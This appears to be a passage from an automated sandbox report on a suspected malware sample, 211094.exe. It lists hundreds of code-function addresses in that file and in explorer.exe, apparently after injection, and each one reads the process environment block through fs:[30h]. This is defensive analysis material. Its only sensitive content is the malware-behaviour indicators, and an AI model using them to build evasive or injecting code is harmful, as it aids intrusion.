      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E563884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E563884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5290AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E504120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E504120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5741E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5669A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5161A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5161A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00562D91 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00564B44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_005657C5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00564FE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B714FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B68DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B3A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B63D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B346A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B6FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B6FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B88F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B33884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADB8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B37016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B84015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B84015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B72073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B81074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
